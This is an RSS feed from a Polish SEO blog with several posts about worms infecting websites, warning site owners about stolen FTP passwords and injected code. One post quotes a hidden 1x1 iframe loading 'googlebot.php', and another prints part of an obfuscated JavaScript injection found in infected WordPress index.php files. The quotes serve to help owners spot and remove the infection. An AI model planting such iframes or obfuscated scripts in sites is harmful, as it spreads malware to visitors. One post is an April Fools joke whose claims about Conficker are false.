<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Pozycjonowanie Rzeszów &#124; Pozycjonowanie stron internetowych &#124; jasq.pl &#187; Robak</title>
	<atom:link href="http://www.jasq.pl/tag/robak/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.jasq.pl</link>
	<description>Pozycjonowanie stron internetowych, SEO PR, reklama w Internecie</description>
	<lastBuildDate>Fri, 03 Feb 2012 18:21:31 +0000</lastBuildDate>
	<language>pl</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Uwaga na robaka w pliku googlebot.php</title>
		<link>http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/</link>
		<comments>http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/#comments</comments>
		<pubDate>Wed, 03 Nov 2010 13:41:52 +0000</pubDate>
		<dc:creator>jasq</dc:creator>
				<category><![CDATA[Informatyka]]></category>
		<category><![CDATA[różne]]></category>
		<category><![CDATA[awaria]]></category>
		<category><![CDATA[problem ze stroną]]></category>
		<category><![CDATA[Robak]]></category>
		<category><![CDATA[robal]]></category>
		<category><![CDATA[strona zablokowana przez Google]]></category>

		<guid isPermaLink="false">http://www.jasq.pl/?p=823</guid>
		<description><![CDATA[Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym blokowanie strony przez Google. Od czasu jego aktywności minęło już trochę czasu, a ostatnio pojawił się nowy problem. Coraz więcej stron otrzymuje ostrzeżenia i blokady od Google &#8211; w kodzie strony można znaleźć taki kod: < !-- Google Optimization -- > < iframe src='vboptimise/googlebot.php' width=1 [...]
Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/przygody-z-gnida-ciag-dalszy/' rel='bookmark' title='Przygody z gnidą ciąg dalszy'>Przygody z gnidą ciąg dalszy</a> <small>Po zmianie hasła do ftp 1 dzień spokoju. Gnida to...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/' rel='bookmark' title='Nazwa pl jednak potrafi pozytywnie zaskoczyć'>Nazwa pl jednak potrafi pozytywnie zaskoczyć</a> <small>Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/' rel='bookmark' title='Conficker &#8211; a jednak zaatakował'>Conficker &#8211; a jednak zaatakował</a> <small>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Wcześniej kilkukrotnie pisałem o <a href="http://www.jasq.pl/tag/robak/">robaku atakującym strony www</a> i powodującym blokowanie strony przez Google. Od czasu jego aktywności minęło już trochę czasu, a ostatnio pojawił się nowy problem.</p>
<p>Coraz więcej stron otrzymuje ostrzeżenia i blokady od Google &#8211; w kodzie strony można znaleźć taki kod:<br />
<code>< !-- Google Optimization  -- ><br />
< iframe  src='vboptimise/googlebot.php'<br />
width=1 heigth=1 frameborder=0 ><br />
< /iframe ><br />
< !-- /Google Optimization -- ></code></p>
<p>Plik oczywiście nie służy optymalizacji strony, natomiast może spowodować pobranie złośliwego kodu przez użytkowników. Robak atakuje skrypt vBuletin, ciężko powiedzieć czy także inne skrypty. Fragment kodu i plik należy oczywiście usunąć, wcześniej zmieniając hasło dostępowe do ftp &#8211; nie należy go też zapamiętywać w kliencie ftp.</p>
<p>Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/przygody-z-gnida-ciag-dalszy/' rel='bookmark' title='Przygody z gnidą ciąg dalszy'>Przygody z gnidą ciąg dalszy</a> <small>Po zmianie hasła do ftp 1 dzień spokoju. Gnida to...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/' rel='bookmark' title='Nazwa pl jednak potrafi pozytywnie zaskoczyć'>Nazwa pl jednak potrafi pozytywnie zaskoczyć</a> <small>Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/' rel='bookmark' title='Conficker &#8211; a jednak zaatakował'>Conficker &#8211; a jednak zaatakował</a> <small>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nazwa pl jednak potrafi pozytywnie zaskoczyć</title>
		<link>http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/</link>
		<comments>http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/#comments</comments>
		<pubDate>Mon, 01 Jun 2009 08:34:20 +0000</pubDate>
		<dc:creator>jasq</dc:creator>
				<category><![CDATA[Informatyka]]></category>
		<category><![CDATA[Konfiguracja]]></category>
		<category><![CDATA[atak na serwis]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[nazwa.pl]]></category>
		<category><![CDATA[Robak]]></category>

		<guid isPermaLink="false">http://www.jasq.pl/?p=388</guid>
		<description><![CDATA[Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile mnie zaskoczyła. Postanowiłem poświęcić zagadnieniu kilka linijek mojego bloga, ponieważ temat jest ważny. Nazwa umożliwia skonfigurowanie dostępu FTP w taki sposób, aby łączyć można było się jedynie z określonych przez nas lokalizacji. Bądź to z IP na terenie Polski, bądź z dokładnie ustalonych przez nas [...]
Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/kolejny-atak/' rel='bookmark' title='Kolejny atak'>Kolejny atak</a> <small>Po wszystkich zabiegach zostałem zaatakowany ponownie. Tym razem zmieniłem hasło...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/seo-copywriting-rzeszow/' rel='bookmark' title='SEO Copywriting Rzeszów'>SEO Copywriting Rzeszów</a> <small>Moje wyniki mówią same za siebie. Mapka może przeskoczyć wyniki...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/' rel='bookmark' title='Conficker &#8211; a jednak zaatakował'>Conficker &#8211; a jednak zaatakował</a> <small>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile mnie zaskoczyła. Postanowiłem poświęcić zagadnieniu kilka linijek mojego bloga, ponieważ temat jest ważny. Nazwa umożliwia skonfigurowanie dostępu FTP w taki sposób, aby łączyć można było się jedynie z określonych przez nas lokalizacji. Bądź to z IP na terenie Polski, bądź z dokładnie ustalonych przez nas IP. Co to daje? Otóż ostatnia liczba zmasowanych ataków przez FTP, ilość witryn z ostrzeżeniem mówi sama za siebie. Ataki były przeprowadzane właśnie za pośrednictwem FTP dzięki skradzionym hasłom dostępu. Teraz będzie to mocno utrudnione a często wręcz niemożliwe. Wprowadzenie tego zabezpieczenia to słuszny krok ze strony nazwy.pl.</p>
<p>Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/kolejny-atak/' rel='bookmark' title='Kolejny atak'>Kolejny atak</a> <small>Po wszystkich zabiegach zostałem zaatakowany ponownie. Tym razem zmieniłem hasło...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/seo-copywriting-rzeszow/' rel='bookmark' title='SEO Copywriting Rzeszów'>SEO Copywriting Rzeszów</a> <small>Moje wyniki mówią same za siebie. Mapka może przeskoczyć wyniki...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/' rel='bookmark' title='Conficker &#8211; a jednak zaatakował'>Conficker &#8211; a jednak zaatakował</a> <small>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Conficker &#8211; a jednak zaatakował</title>
		<link>http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/</link>
		<comments>http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/#comments</comments>
		<pubDate>Wed, 01 Apr 2009 16:20:24 +0000</pubDate>
		<dc:creator>jasq</dc:creator>
				<category><![CDATA[ciekawostki]]></category>
		<category><![CDATA[Informatyka]]></category>
		<category><![CDATA[atak na serwis]]></category>
		<category><![CDATA[awaria]]></category>
		<category><![CDATA[Robak]]></category>
		<category><![CDATA[swiat]]></category>

		<guid isPermaLink="false">http://www.jasq.pl/?p=276</guid>
		<description><![CDATA[Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście zaatakował! Conficker z pomocą milionów maszyn z całego świata zaatakował serwery microsoftu i usunął bezpowrotnie kod Windows Seven. Jak na razie nie wiadomo, czy backupy również zostały usunięte, ale prawdopodobnie tak, skoro &#8222;jedynym ratunkiem dla programistów pozostały kopie kodu z 23 marca&#8221;. Cały tydzień pracy [...]
Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/rozne/conficker/' rel='bookmark' title='Conficker namierzony!'>Conficker namierzony!</a> <small>Symantec dziś wieczorem wypuścił film, na którym zademonstrował jak wygląda...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/' rel='bookmark' title='Nazwa pl jednak potrafi pozytywnie zaskoczyć'>Nazwa pl jednak potrafi pozytywnie zaskoczyć</a> <small>Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/' rel='bookmark' title='Uwaga na robaka w pliku googlebot.php'>Uwaga na robaka w pliku googlebot.php</a> <small>Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście zaatakował! </p>
<p><strong>Conficker</strong> z pomocą milionów maszyn z całego świata zaatakował serwery microsoftu i usunął bezpowrotnie kod Windows Seven. Jak na razie nie wiadomo, czy backupy również zostały usunięte, ale prawdopodobnie tak, skoro &#8222;jedynym ratunkiem dla programistów pozostały kopie kodu z 23 marca&#8221;. Cały tydzień pracy poszedł na marne. I bardzo dobrze. MS i parówkowym skrytożercom mówimy NIE.<br />
<span id="more-276"></span><br />
Jak wiadomo media kłamią <img src='http://www.jasq.pl/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p>Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/rozne/conficker/' rel='bookmark' title='Conficker namierzony!'>Conficker namierzony!</a> <small>Symantec dziś wieczorem wypuścił film, na którym zademonstrował jak wygląda...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/' rel='bookmark' title='Nazwa pl jednak potrafi pozytywnie zaskoczyć'>Nazwa pl jednak potrafi pozytywnie zaskoczyć</a> <small>Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/' rel='bookmark' title='Uwaga na robaka w pliku googlebot.php'>Uwaga na robaka w pliku googlebot.php</a> <small>Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Przygody z gnidą ciąg dalszy</title>
		<link>http://www.jasq.pl/2009/informatyka/przygody-z-gnida-ciag-dalszy/</link>
		<comments>http://www.jasq.pl/2009/informatyka/przygody-z-gnida-ciag-dalszy/#comments</comments>
		<pubDate>Mon, 02 Mar 2009 08:31:00 +0000</pubDate>
		<dc:creator>jasq</dc:creator>
				<category><![CDATA[ciekawostki]]></category>
		<category><![CDATA[Informatyka]]></category>
		<category><![CDATA[Robak]]></category>

		<guid isPermaLink="false">http://www.jasq.pl/?p=95</guid>
		<description><![CDATA[Po zmianie hasła do ftp 1 dzień spokoju. Gnida to &#8222;Trojan-Downloader.JS.Iframe.ajt&#8221;, &#8222;Trojan-Downloader.Win32.Agent.bjoe&#8221; (lub prawdopodobnie podobne), ale jak widać tutaj, nic o niej nie wiadomo. Related posts: Conficker &#8211; a jednak zaatakował Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście... Robal Robal opisany w poprzednim wpisie, jak się okazało, poczynił dość... Kolejny atak Po [...]
Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/' rel='bookmark' title='Conficker &#8211; a jednak zaatakował'>Conficker &#8211; a jednak zaatakował</a> <small>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...</small></li>
<li><a href='http://www.jasq.pl/2009/brak-kategorii/robal/' rel='bookmark' title='Robal'>Robal</a> <small>Robal opisany w poprzednim wpisie, jak się okazało, poczynił dość...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/kolejny-atak/' rel='bookmark' title='Kolejny atak'>Kolejny atak</a> <small>Po wszystkich zabiegach zostałem zaatakowany ponownie. Tym razem zmieniłem hasło...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Po zmianie hasła do ftp 1 dzień spokoju. Gnida to &#8222;Trojan-Downloader.JS.Iframe.ajt&#8221;, &#8222;Trojan-Downloader.Win32.Agent.bjoe&#8221; (lub prawdopodobnie podobne), ale jak widać <a href="http://viruslist.pl/find.html?VN=Trojan-Downloader.JS.Iframe.ajt&#038;referer=kav">tutaj</a>, nic o niej nie wiadomo. <img src="http://img115.imageshack.us/img115/3030/lik.gif" alt="Leży i kwiczy" /></p>
<p>Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/' rel='bookmark' title='Conficker &#8211; a jednak zaatakował'>Conficker &#8211; a jednak zaatakował</a> <small>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...</small></li>
<li><a href='http://www.jasq.pl/2009/brak-kategorii/robal/' rel='bookmark' title='Robal'>Robal</a> <small>Robal opisany w poprzednim wpisie, jak się okazało, poczynił dość...</small></li>
<li><a href='http://www.jasq.pl/2009/informatyka/kolejny-atak/' rel='bookmark' title='Kolejny atak'>Kolejny atak</a> <small>Po wszystkich zabiegach zostałem zaatakowany ponownie. Tym razem zmieniłem hasło...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.jasq.pl/2009/informatyka/przygody-z-gnida-ciag-dalszy/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Kolejny atak</title>
		<link>http://www.jasq.pl/2009/informatyka/kolejny-atak/</link>
		<comments>http://www.jasq.pl/2009/informatyka/kolejny-atak/#comments</comments>
		<pubDate>Sun, 01 Mar 2009 19:55:14 +0000</pubDate>
		<dc:creator>jasq</dc:creator>
				<category><![CDATA[ciekawostki]]></category>
		<category><![CDATA[Informatyka]]></category>
		<category><![CDATA[Robak]]></category>

		<guid isPermaLink="false">http://www.jasq.pl/2009/03/kolejny-atak/</guid>
		<description><![CDATA[Po wszystkich zabiegach zostałem zaatakowany ponownie. Tym razem zmieniłem hasło do FTP &#8211; jeśli pomoże znaczyć to będzie, że ataki przeprowadzane są z mojego kompa. Related posts: Nazwa pl jednak potrafi pozytywnie zaskoczyć Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile... Google po raz kolejny &#8222;zabiera&#8221; przestrzeń&#8230; Wprowadzone ostatnio w Google zmiany nie [...]
Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/' rel='bookmark' title='Nazwa pl jednak potrafi pozytywnie zaskoczyć'>Nazwa pl jednak potrafi pozytywnie zaskoczyć</a> <small>Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/google-po-raz-kolejny-zabiera-przestrzen/' rel='bookmark' title='Google po raz kolejny &#8222;zabiera&#8221; przestrzeń&#8230;'>Google po raz kolejny &#8222;zabiera&#8221; przestrzeń&#8230;</a> <small>Wprowadzone ostatnio w Google zmiany nie są chyba najszczęśliwsze. Menu...</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/' rel='bookmark' title='Uwaga na robaka w pliku googlebot.php'>Uwaga na robaka w pliku googlebot.php</a> <small>Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Po wszystkich zabiegach zostałem zaatakowany ponownie. Tym razem zmieniłem hasło do FTP &#8211; jeśli pomoże znaczyć to będzie, że ataki przeprowadzane są z mojego kompa.</p>
<p>Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/nazwa-pl-jednak-potrafi-pozytywnie-zaskoczyc/' rel='bookmark' title='Nazwa pl jednak potrafi pozytywnie zaskoczyć'>Nazwa pl jednak potrafi pozytywnie zaskoczyć</a> <small>Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/google-po-raz-kolejny-zabiera-przestrzen/' rel='bookmark' title='Google po raz kolejny &#8222;zabiera&#8221; przestrzeń&#8230;'>Google po raz kolejny &#8222;zabiera&#8221; przestrzeń&#8230;</a> <small>Wprowadzone ostatnio w Google zmiany nie są chyba najszczęśliwsze. Menu...</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/' rel='bookmark' title='Uwaga na robaka w pliku googlebot.php'>Uwaga na robaka w pliku googlebot.php</a> <small>Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.jasq.pl/2009/informatyka/kolejny-atak/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Robal</title>
		<link>http://www.jasq.pl/2009/brak-kategorii/robal/</link>
		<comments>http://www.jasq.pl/2009/brak-kategorii/robal/#comments</comments>
		<pubDate>Sun, 01 Mar 2009 16:30:24 +0000</pubDate>
		<dc:creator>jasq</dc:creator>
				<category><![CDATA[Bez kategorii]]></category>
		<category><![CDATA[ciekawostki]]></category>
		<category><![CDATA[Informatyka]]></category>
		<category><![CDATA[Robak]]></category>

		<guid isPermaLink="false">http://www.jasq.pl/?p=92</guid>
		<description><![CDATA[Robal opisany w poprzednim wpisie, jak się okazało, poczynił dość poważne spustoszenia. Wiele witryn zostało nim zainfekowanych a gdy już zassał właściwy kod na dysk (co mnie niestety nie minęło) robił mniej więcej takie rzeczy: przekierowywał na witryny zainfekowane, pomimo wpisania poprawnego url w pasek przeglądarki przekierowywał na zainfekowane witryny po kliknięciu w linki wyszukane [...]
Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/' rel='bookmark' title='Conficker &#8211; a jednak zaatakował'>Conficker &#8211; a jednak zaatakował</a> <small>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...</small></li>
<li><a href='http://www.jasq.pl/2009/rozne/usuwanie-ostrzezenia-z-wynikow-wyszukiwania-google/' rel='bookmark' title='Usuwanie ostrzeżenia z wyników wyszukiwania Google'>Usuwanie ostrzeżenia z wyników wyszukiwania Google</a> <small>Bardzo wiele osób jest zaskoczonych, że w wynikach wyszukiwania pojawia...</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/' rel='bookmark' title='Uwaga na robaka w pliku googlebot.php'>Uwaga na robaka w pliku googlebot.php</a> <small>Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Robal opisany w poprzednim wpisie, jak się okazało, poczynił dość poważne spustoszenia. Wiele witryn zostało nim zainfekowanych a gdy już zassał właściwy kod na dysk (co mnie niestety nie minęło) robił mniej więcej takie rzeczy:</p>
<ul>
<li>przekierowywał na witryny zainfekowane, pomimo wpisania poprawnego url w pasek przeglądarki</li>
<li>przekierowywał na zainfekowane witryny po kliknięciu w linki wyszukane przez google (co dziwne, gdy zajrzałem w źródło &#8222;google&#8221; był tam złośliwy kod, więc prawdopodobnie wyświetlał mi jakiś fake a nie właściwą stronę)</li>
<li>nie pozwolił odpalić żadnego skanera on-line, a jeśli pozwolił, to skaner wieszał się</li>
<li>zauważyłem problemy z wyświetlaniem plików z youtube</li>
<li>spowodował zwisy systemu po starcie &#8211; system wisiał, natomiast dysk pracował na najwyższych obrotach</li>
<li>utrudniał lub uniemożliwiał aktualizację antywirusów</li>
</ul>
<p>Kodu należy szukać w plikach index. Podobno też często są modyfikowane .htaccess &#8211; ja nie zauważyłem modyfikacji. Niektórzy twierdzą, że dostaje się na serwery przez ftp &#8211; nie mogę tego potwierdzić, ponieważ spotkałem się z infekcją na różnych serwerach, z różnymi hasłami i różnych ludzi &#8211; choć możliwe, że to był zbieg okoliczności i faktycznie każdemu z nas skradziono hasła.</p>
<p>Kolejnym poważnym problemem jest to, że jedynie Kaspersky (tylko o nim do tej pory wiem) nie dopuszcza do otwarcia zainfekowanej witryny. Skanowanie zainfekowanego pliku AVG, Avirą, MKS nie dało rezultatów.</p>
<p>Related posts:<ol>
<li><a href='http://www.jasq.pl/2009/informatyka/conficker-a-jednak-zaatakowal/' rel='bookmark' title='Conficker &#8211; a jednak zaatakował'>Conficker &#8211; a jednak zaatakował</a> <small>Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...</small></li>
<li><a href='http://www.jasq.pl/2009/rozne/usuwanie-ostrzezenia-z-wynikow-wyszukiwania-google/' rel='bookmark' title='Usuwanie ostrzeżenia z wyników wyszukiwania Google'>Usuwanie ostrzeżenia z wyników wyszukiwania Google</a> <small>Bardzo wiele osób jest zaskoczonych, że w wynikach wyszukiwania pojawia...</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/' rel='bookmark' title='Uwaga na robaka w pliku googlebot.php'>Uwaga na robaka w pliku googlebot.php</a> <small>Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.jasq.pl/2009/brak-kategorii/robal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Szturm na WordPress</title>
		<link>http://www.jasq.pl/2009/informatyka/szturm-na-wordpress/</link>
		<comments>http://www.jasq.pl/2009/informatyka/szturm-na-wordpress/#comments</comments>
		<pubDate>Sat, 28 Feb 2009 11:44:56 +0000</pubDate>
		<dc:creator>jasq</dc:creator>
				<category><![CDATA[Informatyka]]></category>
		<category><![CDATA[różne]]></category>
		<category><![CDATA[Robak]]></category>

		<guid isPermaLink="false">http://www.jasq.pl/?p=88</guid>
		<description><![CDATA[Uwaga na aktywność robali! WordPress jest na niego podatny (nie udało mi się ustalić, czy było to włamanie na ftp, czy WP ma dziurę) &#8211; jeden z postawionych przeze mnie miał czyraka. Do pliku index.php dopisują śmieci. Źródło strony po zainfekowaniu, po znaczniku /html; zawiera podobny kod. Usunięcie go jest bardzo wskazane: ad &#8211;;script uyimh=687; [...]
Related posts:<ol>
<li><a href='http://www.jasq.pl/2011/ciekawostki/blogi-na-wordpress-com/' rel='bookmark' title='Blogi na wordpress.com'>Blogi na wordpress.com</a> <small>WordPress usunął kilkadziesiąt moich blogów postawionych pod koniec 2009 roku....</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/' rel='bookmark' title='Uwaga na robaka w pliku googlebot.php'>Uwaga na robaka w pliku googlebot.php</a> <small>Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Uwaga na aktywność robali! WordPress jest na niego podatny (nie udało mi się ustalić, czy było to włamanie na ftp, czy WP ma dziurę) &#8211; jeden z postawionych przeze mnie miał czyraka.</p>
<p>Do pliku index.php dopisują śmieci. Źródło strony po zainfekowaniu, po znaczniku /html; zawiera podobny kod. Usunięcie go jest bardzo wskazane:</p>
<blockquote><p> ad &#8211;;script<br />
uyimh=687;<br />
qxcxg=4804;<br />
ddytx=7948;<br />
xkjpv=&#8221;write&#8221;;<br />
mzsrv=&#8221;me&#8221;;<br />
zqfqw=&#8221;et&#8221;;<br />
gdtrk=&#8221;/&#8217; st&#8221;;<br />
rpiia=&#8221;yl&#8221;;<br />
qxaol=&#8221;";<br />
ldlvw=&#8221;i&#8221;;<br />
zfhuu=&#8221;ty&#8221;;<br />
hvkhb=&#8221;:h&#8221;;<br />
hbqmm=&#8221;d&#8221;;<br />
hauzn=&#8221;";<br />
zdqdp=4;<br />
sjgbi=&#8221;if&#8221;;<br />
rpygo=&#8221;r&#8221;;<br />
syjnh=&#8221; sr&#8221;;<br />
rwanv=&#8221;c&#8221;;<br />
elujl=&#8221;=&#8221;;<br />
hrgnc=863;<br />
akzpp=8853;<br />
tplxn=&#8221; &#8222;;<br />
qtndm=&#8221;";<br />
jlooz=3953;<br />
uyimh=687;<br />
qxcxg=4804;<br />
ddytx=7948;<br />
xkjpv=&#8221;write&#8221;;<br />
mzsrv=&#8221;me&#8221;;<br />
zqfqw=&#8221;et&#8221;;<br />
gdtrk=&#8221;/&#8217; st&#8221;;<br />
rpiia=&#8221;yl&#8221;;<br />
qxaol=&#8221;";<br />
ldlvw=&#8221;i&#8221;;<br />
zfhuu=&#8221;ty&#8221;;<br />
hvkhb=&#8221;:h&#8221;;<br />
hbqmm=&#8221;d&#8221;;<br />
hauzn=&#8221;";<br />
zdqdp=4;<br />
sjgbi=&#8221;if&#8221;;<br />
rpygo=&#8221;r&#8221;;<br />
syjnh=&#8221; sr&#8221;;<br />
rwanv=&#8221;c&#8221;;<br />
elujl=&#8221;=&#8221;;<br />
hrgnc=863;<br />
akzpp=8853;<br />
tplxn=&#8221; &#8222;;<br />
qtndm=&#8221;";<br />
jlooz=3953;<br />
gftzo=(9.007e3&lt;=5e1?uyimh:qxcxg);<br />
jjaqh=(ddytx&lt;.2438?xkjpv:3.);<br />
gmbpt=(7.3e1&lt;=36?mzsrv:.45);
</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://www.jasq.pl/2011/ciekawostki/blogi-na-wordpress-com/' rel='bookmark' title='Blogi na wordpress.com'>Blogi na wordpress.com</a> <small>WordPress usunął kilkadziesiąt moich blogów postawionych pod koniec 2009 roku....</small></li>
<li><a href='http://www.jasq.pl/2010/informatyka/uwaga-na-robaka-w-pliku-googlebot-php/' rel='bookmark' title='Uwaga na robaka w pliku googlebot.php'>Uwaga na robaka w pliku googlebot.php</a> <small>Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.jasq.pl/2009/informatyka/szturm-na-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

